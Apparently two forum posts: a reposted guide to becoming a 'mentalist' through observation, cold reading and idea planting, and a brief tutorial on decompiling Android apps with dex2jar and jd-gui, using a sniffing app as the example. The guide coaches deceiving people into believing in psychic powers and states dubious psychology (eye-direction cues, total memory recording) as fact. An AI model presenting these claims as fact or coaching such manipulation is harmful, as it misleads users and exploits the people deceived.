Un articol interesant, initial m-am gandit sa il pun in tutoriale engleza dar ca sa evit unele discutii am zis ca e mai bine sa il pun aici. A mentalist is an individual who appears to have supernatural powers in divining the truth about an individual as well as many facts about that person's life. A mentalist must be great at decoding, possess observational skills, and have a highly developed ability to observe minute detail. Many people, from criminal profilers to magicians, all use mentalist tactics and a working knowledge of psychology to interpret human behavior. Wanna get your Simon Baker on? Here's how. Part One: Finding the Truth 1. Make snap, educated judgments. Part of being a mentalist is about trusting your judgment. Unfortunately, most people have turned their observation skills off. General and non-overt assessment of an individual provides good background information that is normally missed. For example, are the person's hands soft or calloused? Is his musculature toned or not? Is the person dressed to stand out or to hide? Take yourself right now -- what might someone learn about you just from looking at you? There are dozens of general assessment information items that will help you to profile the individual. Think of Sherlock Holmes -- he didn't have ESP, he just noticed things. That's all. A slight tan line on the left ring finger. A pen mark on the left hand. He would now trust that this person is either divorced or separated and right-handed. Trust those snap judgments! 2. Look for physical cues in others. A mentalist's work lies in stirring memories and causing the "tells" to appear, even if the person cannot bring to mind the information. “Tells” will help you to observe what the mind knows but the memory cannot call forth. Remember that although someone may say they do not remember something, the brain records everything. As such, the information is there, but just not accessible to that person at that time. "Tells" include: Dilation or constriction of the pupil of the eye (dilation is associated with positive emotion; constriction with negative) Where the person gazes Rate of respiration Heart rate Relative perspiration of the body 3. Use yourself as your first guinea pig. Knowing what tells to look for isn't helpful if you don't know what they mean. While each person is a bit different, tells are called as such because they're usually consistent. So get in front of a mirror and start studying your own face. Here's a few things to look for: When you think of a positive memory, your pupils should dilate. When you think of a negative experience, they should constrict. Imagine both of these scenarios and see what happens. Think of an answer to this question: What do you like about going to the beach? Once you've come up with your answer, note where you looked. If you said something like fire, you probably visualized it and looked up. If you said something like the sounds and the smells, you probably remained at eye level. If you said the sand in your hands, you may have looked down. Visual answers generally go up, aural stays level, and hands-on memories draw gaze downward. Make yourself nervous. How does it manifest in your body? What is your heart doing? Your breathing? What are you doing with your hands? Now run through other emotions too -- sadness, happiness, stress, etc. 4. Detect lies. Much of detecting lies is seeing the tells we just covered. In fact, that's what a polygraph does -- it measures blood pressure, pulse, and perspiration. The higher these numbers, the more likely the person is lying. But you can also do things a polygraph can't do -- like see when people aren't looking you in the eye, twiddling their thumbs, or being inconsistent in their verbal and non-verbal behavior. A good thing to master is detecting micro-expressions. These are little flashes of how the person actually feels before they consciously cover it up. They're often feelings of distress or negative feelings they don't want other people to see for one reason or another. Pay attention to their entire body -- how much their gulping, if they're touching their nose or mouth, what they're doing with their hands, fingers, and feet, and how they're standing in relation to you. Are they angled toward the door? They probably subsconsciously want to get away! 5. Ask leading questions. Persuading people is a huge part of being a mentalist. At the very least, you're persuading them you are a mentalist! If a person is given some evidence that one can “read their mind," they are easily confused between telepathy and observation/persuasion. A simple way to do this is to ask leading questions. John Edward and other TV personalities are great at this. They start with, "I'm seeing a 19. Does that mean anything to anyone?" They start out vague until someone latches on. Then, once someone does, he'll ask questions like, "You were very close to him, weren't you?" and the person answers, feeling like they're understood. He's just asking very vague questions and the person is filling in the gaps for him! 6. Practice casually sweeping the room with an observant gaze. Look for all detail in the environment. Observe all human interaction, from the one-on-one to how the room is grouped. Often just a ten second look into a room can tell you how each person is feeling. If you see one or two people near the door, they may be socially anxious. See a person whose body language is clearly focused on someone else? They're interested in that person, probably sexually. And if everyone is aligned toward one person in the room, you've found your alpha. And that's just three examples. If you can, record something. Start with small segments, observe, record, then view again several times to find what information you missed the first time. Part Two: Convincing Others 1. Memorize a “baseline” of behavior for the people you're dealing with. This means how a person normally acts in any given circumstance. Since people are different, you'll be a lot more effective in your readings if you have a baseline first. And you'll know how receptive they're feeling toward you! An easy example is think of naturally flirty people. When they're comfortable, they may be touching, laughing, and poking away at someone they find attractive. Other people, while comfortable, might consider that a violation of a person's bubble. Both people are feeling the same way, they just show it in very different ways. 2. Be confident. 99% of getting people to believe/agree with you is confidence (statistic yet to be verified). How do politicians get elected? What makes a salesman effective? Who gets the ladies? We may think it has something to do with smarts or with looks (and those definitely don't hurt), but what it really boils down to is confidence. When you're confident enough, it doesn't even occur to other people to question your judgment. If you're nervous about professing your mentalist ways, you gotta kick that nasty habit! What you're really selling here is yourself. People are looking to you to be convinced -- they're not looking for the most accurate or logical information. When you realize it's not what you say, it's how you say it, a lot of the pressure falls away. 3. Listen. The fact of the matter is that people tell us things way more often than we realize. If we were better listeners, a whole new world would open up to us. Our memories would improve and we would make connections we didn't see before. That's what mentalists do! An important part of listening and being an effective mentalist is reading between the lines. Seeing what people really mean when they're talking. If your friend walked up to you and said, "Ohmigosh, I worked out soooooo hard today," they're actually saying, "Please give me a pat on the back. I need to be told I'm fit." It's this underlying text that will clue you in when people don't realize you're any the wiser. 4. Act natural. What it boils down to is that you're really putting on a show. So instead of pretending to be someone you're not and making this dramatic scene about it, just be yourself! The genuine you is a lot more convincing than anything else. If anything, be slightly amused. Think of those actors giving interviews that constantly have a slight smile on their faces and are prone to little bouts of subdued laughter. They're totally relaxed and they just seem, well, cool. Be that guy! 5. Plant ideas. And you thought Inception was just an awesome Leonardo diCaprio movie. While you can't plant dreams yet, you can plant ideas. Let's say you want to get someone to think of a word and the word you want them to think of is "watch." You would insert that word into your conversation beforehand, glance at yours casually (albeit briefly), and then ask them to think of something like an accessory. Boom. Mind read. Start experimenting with this on small levels, like the example above. Grab a friend or two and see if you can come up with a few scenarios on your own where they don't know they're getting ideas planted in their brains. Once you come up with half a dozen or so words you can easily plant, you can impress anyone at a moment's notice. 5. Don't give away your secrets. If you've ever asked a magician to tell you how he does one of his tricks, if he's any good he never spills! He shouldn't even explain a trick that any other magician does (or the union will kick him out). You should be the same! If someone asks you how you do something, simply shrug your shoulders and equate it to your awesomeness. Don't accidentally give it away, either. "Ah, I see you looked up and to the left," gives away that you're monitoring their eyes, even if you don't tell them what it signifies. You want them to think there's something extra-sensory about you, something that other people don't have. So be mysterious. You'll only increase their intrigue. Part Three: Going the Extra Mile 1. Read, read, and then read some more about mentalists and how they work. There are many books on interviewing people and interpreting even the slightest facial movements, body tells, and mind-manipulation. Annemann’s Practical Mental Effects and Corinda’s13 Steps to Mentalism are two good places to start. As is T.A. Waters’ Mind, Myth and Magick. No one better to learn from than the pros! 2. Study up on different, yet related, areas. To give yourself more cred -- and just because you may also find it interesting -- venture into other related realms. Think of reading up on dream interpretation, tarot cards, astrology, and telepathy and telekinesis, just to name a few. Might as well make yourself well-rounded! Consider learning new skills, too. Look into hypnosis, palm reading, and other people-reading skills. Then when you're being your mentalist self, you could always truthfully say, "I could hypnotize you, but I shouldn't have to do that." 3. Train your mind. It's a muscle, really. If you don't use it, you'll lose it. So start playing chess, doing Sudoku, and solving riddles. Do crossword puzzles. Spend your free time reading and doing DIY projects. Paint (that's a good one for noticing details). Take an acting class (also good for detail and emotion). All of these are things that can help you increase your mental power. Use the Internet! Visit sites like Lumosity, Khan Academy, Coursera, and Memrise and make sure you train your mind regularly. Deductive reasoning and critical thinking are two skills that aren't necessarily used while being a mentalist, but they get the skills you do use going a lot faster! Sherlock may be able to notice that lack of a wedding ring, but if it takes him a day and a half to put it together, Watson's dead by then. So keep mentally agile and stay on top of your game. 5. Find a job where you can use your skills. Whether you're looking to be a magician or a criminal profiler or a TV star, why not make a little moolah off of your mad observational skills and people-reading prowess? You'll hone your methods and learn even more tricks of the trade. If you haven't thought about it before, start! Get to reading How to Be a Magician, How to Be an FBI Profiler, How to Be a Detective, or even How to Get on TV. If Honey Boo Boo can do it, you certainly can! ----------------------- #sursa: minds.com
-
Tools Required: Dex2jar : It is a tool which is used when working with android .dex and java .jar files. Jd-gui : This tool opens up the entire coding of .apk file. You can Download both these tools from here. In this article I will be taking example of faceniff.apk, but you can take any app of your choice. Steps involved in reverse engineering android app: Change the extension of android app to “faceniff.apk.zip“. Unzip the file using any unzipping software. Now open the command prompt and type “cd “. Then type “cd c:androiddex2jar-0.0.9.7?. (Here “C:androiddex2jar-0.0.9.7” is the path of dex2jar tool in my drive, this may be different for you). Press enter. Now type “dex2jar c:androidFaceniffclasses.dex“. Here “c:androidFaceniffclasses.dex” is the path of the classes.dex file which your will surely be in the extracted folder of the android app. You will notice a new executable jar file in the unzipped folder of app. Now open that app with “jd.gui” and you will be able to see the source code of android app. Credite: Shikil Sharma